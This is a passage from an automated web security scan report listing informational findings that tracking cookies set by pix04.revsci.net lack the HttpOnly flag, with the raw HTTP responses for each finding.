The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLwKIREfXDY7ViGzONef0liDtqNncA2iFgL2LcmTUz/xw+ppzybAZxKwWQY0UUnQiG5kFQmZoeI+2ZBSjkw/QKBeEE1xCXKzbX6BtHZFDnD6taOUzkZssC9SmHYB9KeGG/XzENTIKkCoUUZ4/wp7/xZIJqCDRJxxA47nJB9Xwz2W1oW7yZVEh7y/CXlCsjZg2b1BrZ/rYVa7IulGT084e0l4n30SghEbDXoaJXhjriypIHg/FEMsakEZ21tqC1IR0TAJE8L3JOhIxn+HciQF2mHnVgpdKWhwjQw5LGokyTcjv/ole3kAgyg01uv0UTvZOVMEDmiWOqkH0nGkrdVNsS8f8urLmG1UX1hCiOaB1ffI2tchDu+MOABggAS4Em/QKFAMR40MgzBcQCyEyLT5Icxv9GNAvG0EEkjiWmCmzx8iEvQMNNobKY86AmxfF0Vkky+sy3xtb5ziRTXOPO8h2SM8u/GqRdNOa6JTPKG786KGVIr3UPetLR+8KjuUaUzDj3mfgF9zcggYMGL4e8jDJ+77LnuApfS5T251pJOp39UNYld2V4pabM31sBTeYPU3jQSGJN/7Cv1D1ppac7z0ux+12aq36lBvZiDAqONmiLOgpLAIgPmP/9FGpoCg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:51:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.158. http://pix04.revsci.net/I10985/b3/0/3/1008211/118546994.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/118546994.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bn2X4Y1WNOeKX+gFaj+QEzDd7lDX0r6uuE6KEHUTV7VrJfYQc8j7ixrfHU9uQwGvbx7nRS9kOyODH0/l/KPGV9m3O2z1pYNIuFGQpkIZx0ZFXv/oUdXx1+hQFPbRtkGUDxXUi6CBi64g+YpZpA2k/FgE6FJQwneNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:17:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bn2X4Y1WNOeKX+gFaj+QEzDd7lDX0r6uuE6KEHUTV7VrJfYQc8j7ixrfHU9uQwGvbx7nRS9kOyODH0/l/KPGV9m3O2z1pYNIuFGQpkIZx0ZFXv/oUdXx1+hQFPbRtkGUDxXUi6CBi64g+YpZpA2k/FgE6FJQwneNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:17:16 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:17:15 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.159. http://pix04.revsci.net/I10985/b3/0/3/1008211/128597095.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/128597095.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkThwCImeVPvvjt7QnAcOPwWBY+yD5ZCC6vEFB9t1/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzR7Izh3TZRoFmqM1aWr9ESPbI6B5njnomM9keCJJeZd7HKOaa3sQ56dXDRCl96t6bVXBkQI0c9KpvJ+jqzu2BGNmJfu3ZLzDoVWgROkpogdZn+UVZhuplunW41Y23J+N639Yk0FAXcAE73YN7Dql57uFUq6djlE801fgUQBozQLnN1pBn4BVzaKGaHjVCCN5847oFr/g/g1Uf6aBioz68wfdBVQtRaxp7mjRVALNK9LKeG1VvZoFg==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:10:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkThwCImeVPvvjt7QnAcOPwWBY+yD5ZCC6vEFB9t1/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzR7Izh3TZRoFmqM1aWr9ESPbI6B5njnomM9keCJJeZd7HKOaa3sQ56dXDRCl96t6bVXBkQI0c9KpvJ+jqzu2BGNmJfu3ZLzDoVWgROkpogdZn+UVZhuplunW41Y23J+N639Yk0FAXcAE73YN7Dql57uFUq6djlE801fgUQBozQLnN1pBn4BVzaKGaHjVCCN5847oFr/g/g1Uf6aBioz68wfdBVQtRaxp7mjRVALNK9LKeG1VvZoFg==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:10:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 17 Jun 2011 10:10:58 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.160. http://pix04.revsci.net/I10985/b3/0/3/1008211/149141737.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/149141737.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq3/uioEppzybAZxKwaQY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1yCXK3aX6BtHZFDnD6taOUzkZssC9SmHYB+KGGe5X1cNTJKECoUMZ4/wp7+XvOCqse5myjM47fJG9XyF3o2LcLH2JBctdDfkUpvsKp7h/8wrQqfNTmNrtJFgpskRYf+ovvy93QA4saI/5RCJ9S8KLVFBQ+BRLHzkbmX4zNmcoVxKjLhqBHgxD0FT5+Ln1KN2UyKNEy7XX5OrG9hyFdTjX30ylHdMWwEsYD/pKMRwVsoZWhFeqiNuc9cEqQSsRhxMU+2RP38baOVRIfW7/Btj8cBj5LlhrfD1Tn16oha4M5/ZotDYi5/qazTNFubn1Qt7A7EjnhWEqLIcLhI8s2+uLnXyw6x5d4nIsCtuBLdS6gErWZy3JVzYmv8h5NUyK70aIxzVqEJ31X7Jh5lt0ikrpLRZHqRm+gqnWlGok2BK90Q7cZj8HFd4Zr6+rib0GqKI2iHV1KH25wKH+p19498lf+VhpUrQ+FcB+ySMYhO2SGL9y8zm3D31ukc6uHMWlP0Ri5DxCYEj3aJUJsmrCjpLAPQLmN/9YMtoBA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:52:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq3/uioEppzybAZxKwaQY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1yCXK3aX6BtHZFDnD6taOUzkZssC9SmHYB+KGGe5X1cNTJKECoUMZ4/wp7+XvOCqse5myjM47fJG9XyF3o2LcLH2JBctdDfkUpvsKp7h/8wrQqfNTmNrtJFgpskRYf+ovvy93QA4saI/5RCJ9S8KLVFBQ+BRLHzkbmX4zNmcoVxKjLhqBHgxD0FT5+Ln1KN2UyKNEy7XX5OrG9hyFdTjX30ylHdMWwEsYD/pKMRwVsoZWhFeqiNuc9cEqQSsRhxMU+2RP38baOVRIfW7/Btj8cBj5LlhrfD1Tn16oha4M5/ZotDYi5/qazTNFubn1Qt7A7EjnhWEqLIcLhI8s2+uLnXyw6x5d4nIsCtuBLdS6gErWZy3JVzYmv8h5NUyK70aIxzVqEJ31X7Jh5lt0ikrpLRZHqRm+gqnWlGok2BK90Q7cZj8HFd4Zr6+rib0GqKI2iHV1KH25wKH+p19498lf+VhpUrQ+FcB+ySMYhO2SGL9y8zm3D31ukc6uHMWlP0Ri5DxCYEj3aJUJsmrCjpLAPQLmN/9YMtoBA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:52:17 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:52:16 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.161. http://pix04.revsci.net/I10985/b3/0/3/1008211/152539728.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/152539728.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638OC50EZltz+itXswYg6aG0Cz85wyWVUagoY/y3ZrR2yFdORAExtLnEqN2My6sEyzWP3Oe/MA8C1FjR18yFHvMOs1J+Dr9NMmAZxdYL3KF+ENbS9yb/mOe297VH+NlH7TE83cuTXCnr8SOCGmMmdMA6h175yxIjBb8Mzz+EdulvJish3WpFuaj1UsbDzE/DdcFBwAjTQbVdeid7P0ZSWlEh4DBz8ZSIsBQtyIIhSOP7byyJpLCzXFOprPkZ6Z2LaGx1ar6uvvfXos1Y4bGwiXzOEz0MQNLJUAZ52Q2cej8mFe+Zr6mqja6lDLQSZuadJulAwL6WHmVZDAvAlEla/glRUyBL2+ufhADgmtrTIbBcM8tSNpifAGlhZw5PwYPffBz0FoI0Shh0kOn2LoPZG2jFUBn6Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:14:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638OC50EZltz+itXswYg6aG0Cz85wyWVUagoY/y3ZrR2yFdORAExtLnEqN2My6sEyzWP3Oe/MA8C1FjR18yFHvMOs1J+Dr9NMmAZxdYL3KF+ENbS9yb/mOe297VH+NlH7TE83cuTXCnr8SOCGmMmdMA6h175yxIjBb8Mzz+EdulvJish3WpFuaj1UsbDzE/DdcFBwAjTQbVdeid7P0ZSWlEh4DBz8ZSIsBQtyIIhSOP7byyJpLCzXFOprPkZ6Z2LaGx1ar6uvvfXos1Y4bGwiXzOEz0MQNLJUAZ52Q2cej8mFe+Zr6mqja6lDLQSZuadJulAwL6WHmVZDAvAlEla/glRUyBL2+ufhADgmtrTIbBcM8tSNpifAGlhZw5PwYPffBz0FoI0Shh0kOn2LoPZG2jFUBn6Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:14:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:14:20 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.162. http://pix04.revsci.net/I10985/b3/0/3/1008211/153416135.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/153416135.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQpzax0RBh/hoCyNk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WLZYBIlHHq5L+Vu6oYeS0lSb84FoFlDVAUEgoeqnG3CWwQTGxfWB8xHls9O7wrmK7H9XO38QK/GK4m862ulXtBHxCFUVWq3L7O2akFAHGDjHWNgyYfzAVKcGUKsb7c0ueNVXz4bz+RGuUL0cgwDiNcshcM5rYLHakbTgOQpubiK0FnBwLC4Iw0QwgHlnG6G7nFLlfK6YH9XLbiwKr5G1YfVXDdoBS3tnzQ08ZuM5KoSKLm23Mt2SxjiYI8+RcXY5QaOh0SofSSymrU58McEJNKMZ4/9Aq1RNvG6F8HWKJRGbi5fzUpuQWLbTntgaLEyh+Ovw0FNtzEoIhpX/z4XCnFAOi1IlVuByF8jp0Xb98q1rGU21xgkt4RCn3JvBikgQlZI5JK0CxY7oVaG5eG9rlgxhrs9bkID/BCDos5cWZVp51AN9l3FoPWkzbOjBE8nea+Ut0CKbZnO5TIzGv94HEiuEF/hc+OsRT6l6ts5L0U+d+JKlpeBaK8xVnt+lGd11fNCUSykyq5Anzo1D0fw9EKv8Cg2XpPnETLw1EMX29eMJEqUnP3x4AypDPjS0kmCx+2RfowHaNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:39:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQpzax0RBh/hoCyNk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WLZYBIlHHq5L+Vu6oYeS0lSb84FoFlDVAUEgoeqnG3CWwQTGxfWB8xHls9O7wrmK7H9XO38QK/GK4m862ulXtBHxCFUVWq3L7O2akFAHGDjHWNgyYfzAVKcGUKsb7c0ueNVXz4bz+RGuUL0cgwDiNcshcM5rYLHakbTgOQpubiK0FnBwLC4Iw0QwgHlnG6G7nFLlfK6YH9XLbiwKr5G1YfVXDdoBS3tnzQ08ZuM5KoSKLm23Mt2SxjiYI8+RcXY5QaOh0SofSSymrU58McEJNKMZ4/9Aq1RNvG6F8HWKJRGbi5fzUpuQWLbTntgaLEyh+Ovw0FNtzEoIhpX/z4XCnFAOi1IlVuByF8jp0Xb98q1rGU21xgkt4RCn3JvBikgQlZI5JK0CxY7oVaG5eG9rlgxhrs9bkID/BCDos5cWZVp51AN9l3FoPWkzbOjBE8nea+Ut0CKbZnO5TIzGv94HEiuEF/hc+OsRT6l6ts5L0U+d+JKlpeBaK8xVnt+lGd11fNCUSykyq5Anzo1D0fw9EKv8Cg2XpPnETLw1EMX29eMJEqUnP3x4AypDPjS0kmCx+2RfowHaNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:39:53 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:39:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.163. http://pix04.revsci.net/I10985/b3/0/3/1008211/167338616.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/167338616.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDwdmDq/nU81qU4zkObBUGuxPKlZD0L0UrsFo4m2KveUXns+WX8POygBYhoGA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:32:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDwdmDq/nU81qU4zkObBUGuxPKlZD0L0UrsFo4m2KveUXns+WX8POygBYhoGA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:32:43 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:32:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.164. http://pix04.revsci.net/I10985/b3/0/3/1008211/174739392.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/174739392.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKgOG0VtDwsiIIhSOP7byyJpLCrXXOsLPkZ6Z2LaGx1SrMuvvfXos1Y4bG6iTztIytZ+4oloPzFDWLZalCAK9m0inSch7wHrKI2jDUVJMyl3syAq1j4FvExFWoTXBQT1YB2yKMYnbjVCCN585UoNoYNGZauHeS+e3SNHvhCIOr3FpcNYlbfpi0IF12pvSN0XZoFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:03:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKgOG0VtDwsiIIhSOP7byyJpLCrXXOsLPkZ6Z2LaGx1SrMuvvfXos1Y4bG6iTztIytZ+4oloPzFDWLZalCAK9m0inSch7wHrKI2jDUVJMyl3syAq1j4FvExFWoTXBQT1YB2yKMYnbjVCCN585UoNoYNGZauHeS+e3SNHvhCIOr3FpcNYlbfpi0IF12pvSN0XZoFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:03:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 19:03:46 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
